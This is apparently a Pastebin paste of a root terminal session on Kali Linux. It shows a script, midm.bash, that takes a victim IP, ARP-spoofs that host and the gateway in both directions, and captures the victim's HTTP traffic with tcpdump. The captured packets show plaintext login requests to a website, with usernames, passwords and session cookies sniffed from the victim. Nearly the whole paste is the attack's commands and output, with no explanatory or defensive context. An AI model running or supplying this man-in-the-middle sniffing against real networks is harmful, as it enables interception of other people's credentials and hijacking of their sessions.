Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 0 packets received by filter
- 0 packets dropped by kernel
- root@kali:~/Desktop/scripts# nano midm.bash
- root@kali:~/Desktop/scripts# ./midm.bash
- Enter victim IP followed by [ENTER]
- 192.168.1.13
- gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.13 192.168.1.1;/bin/bash"
- gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.1 192.168.1.13;/bin/bash"
- Do you wish to [r]ead or [w]rite tcpdump output?
- r
- tcpdump -s 0 -i wlan0 -A host 192.168.1.13 and tcp port http;/bin/bash
- tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
- listening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes
- 01:21:31.250436 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [S], seq 2634145743, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
- E..4n^@...1.....h.1.b..P.......... .................
- 01:21:31.250463 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [S], seq 2634145743, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
- E..4n^@...2.....h.1.b..P.......... .................
- 01:21:31.261870 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 688909077, win 16425, length 0
- E..(n_@...1.....h.1.b..P....)...P.@)!w..
- 01:21:31.261894 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 1, win 16425, length 0
- E..(n_@...2.....h.1.b..P....)...P.@)!w..
- 01:21:31.265321 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 0:690, ack 1, win 16425, length 690: HTTP: POST /userlogin.php HTTP/1.1
- E...n`@.........h.1.b..P....)...P.@)| ..POST /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Content-Length: 50
- Cache-Control: max-age=0
- Origin: http://www.crohacks.net
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149
- username=asd123&password=testpassword&submit=Login
- 01:21:31.265337 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 0:690, ack 1, win 16425, length 690: HTTP: POST /userlogin.php HTTP/1.1
- E...n`@.../.....h.1.b..P....)...P.@)| ..POST /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Content-Length: 50
- Cache-Control: max-age=0
- Origin: http://www.crohacks.net
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149
- username=asd123&password=testpassword&submit=Login
- 01:21:31.413801 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 505, win 16299, length 0
- E..(na@...1.....h.1.b..P....)...P.?..K..
- 01:21:31.413833 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 505, win 16299, length 0
- E..(na@...2.....h.1.b..P....)...P.?..K..
- 01:21:31.416923 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 690:1275, ack 505, win 16299, length 585: HTTP: GET /userlogin.php HTTP/1.1
- E..qnb@.../C....h.1.b..P....)...P.?.E...GET /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- 01:21:31.416944 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 690:1275, ack 505, win 16299, length 585: HTTP: GET /userlogin.php HTTP/1.1
- E..qnb@...0C....h.1.b..P....)...P.?.E...GET /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- 01:21:31.488643 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 3258, win 16425, length 0
- E..(nc@...1.....h.1.b..P....)...P.@)....
- 01:21:31.488676 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 3258, win 16425, length 0
- E..(nc@...2.....h.1.b..P....)...P.@)....
- 01:21:33.251912 IP 192.168.1.13.25018 > bud02s24-in-f16.1e100.net.http: Flags [.], seq 56568081:56568082, ack 3800290246, win 16445, length 1: HTTP
- E..)ng@..........:..a..P._).....P.@=.....
- 01:21:33.251932 IP 192.168.1.13.25018 > bud02s24-in-f16.1e100.net.http: Flags [.], seq 0:1, ack 1, win 16445, length 1: HTTP
- E..)ng@..........:..a..P._).....P.@=.....
- ^C
- 14 packets captured
- 14 packets received by filter
- 0 packets dropped by kernel
- root@kali:~/Desktop/scripts# ./midm.bash
- Enter victim IP followed by [ENTER]
- 192.168.1.13
- gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.13 192.168.1.1;/bin/bash"
- gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.1 192.168.1.13;/bin/bash"
- Do you wish to [r]ead or [w]rite tcpdump output?
- r
- tcpdump -s 0 -i wlan0 -A host 192.168.1.13 and tcp port http;/bin/bash
- tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
- listening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes
- 01:23:05.544991 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [S], seq 1481341901, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
- E..4s.@...,D....h.1.b..PXK{....... .................
- 01:23:05.545050 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [S], seq 1481341901, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
- E..4s.@...-D....h.1.b..PXK{....... .................
- 01:23:05.557082 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 3840930751, win 16425, length 0
- E..(s.@...,O....h.1.b..PXK{.....P.@)....
- 01:23:05.557095 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 1, win 16425, length 0
- E..(s.@...-O....h.1.b..PXK{.....P.@)....
- 01:23:05.557110 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 0:725, ack 1, win 16425, length 725: HTTP: POST /userlogin.php HTTP/1.1
- E...s.@...)y....h.1.b..PXK{.....P.@)x...POST /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Content-Length: 43
- Cache-Control: max-age=0
- Origin: http://www.crohacks.net
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- username=testing&password=heki&submit=Login
- 01:23:05.557120 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 0:725, ack 1, win 16425, length 725: HTTP: POST /userlogin.php HTTP/1.1
- E...s.@...*y....h.1.b..PXK{.....P.@)x...POST /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Content-Length: 43
- Cache-Control: max-age=0
- Origin: http://www.crohacks.net
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Content-Type: application/x-www-form-urlencoded
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- username=testing&password=heki&submit=Login
- 01:23:05.644022 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 404, win 16324, length 0
- E..(s.@...,M....h.1.b..PXK~....RP.?.....
- 01:23:05.644057 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 404, win 16324, length 0
- E..(s.@...-M....h.1.b..PXK~....RP.?.....
- 01:23:05.647147 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 725:1310, ack 404, win 16324, length 585: HTTP: GET /userlogin.php HTTP/1.1
- E..qs.@...*.....h.1.b..PXK~....RP.?.)c..GET /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- 01:23:05.647165 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 725:1310, ack 404, win 16324, length 585: HTTP: GET /userlogin.php HTTP/1.1
- E..qs.@...+.....h.1.b..PXK~....RP.?.)c..GET /userlogin.php HTTP/1.1
- Host: www.crohacks.net
- Connection: keep-alive
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- Referer: http://www.crohacks.net/userlogin.php
- Accept-Encoding: gzip, deflate, sdch
- Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
- Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
- 01:23:05.724867 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 3157, win 16425, length 0
- E..(s.@...,K....h.1.b..PXK......P.@).$..
- 01:23:05.724898 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 3157, win 16425, length 0
- E..(s.@...-K....h.1.b..PXK......P.@).$..
- ^C
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement